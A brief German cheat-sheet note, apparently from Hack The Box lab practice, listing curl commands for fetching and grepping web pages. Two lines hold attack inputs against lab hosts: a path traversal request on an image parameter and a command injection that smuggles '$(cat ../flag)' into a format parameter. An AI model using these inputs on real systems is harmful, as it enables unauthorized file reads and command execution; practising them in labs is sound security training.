HTML Source Code
Um schnell eine Seite zu greppen:
curl -s -X GET "https://www.inlanefreight.com/" | html2text
oder
url -s -X GET "http://10.10.11.204:8080/show_image?img=cat.jpeg" | html2text
oder
curl -s -X GET "http://10.10.11.204:8080/show_image?img=../../../../../../"
oder
curl 'http://142.93.35.92:30370/?format=%H-%M-%S-%27;$(cat%20../flag)%27' | html2text | grep HTB{
→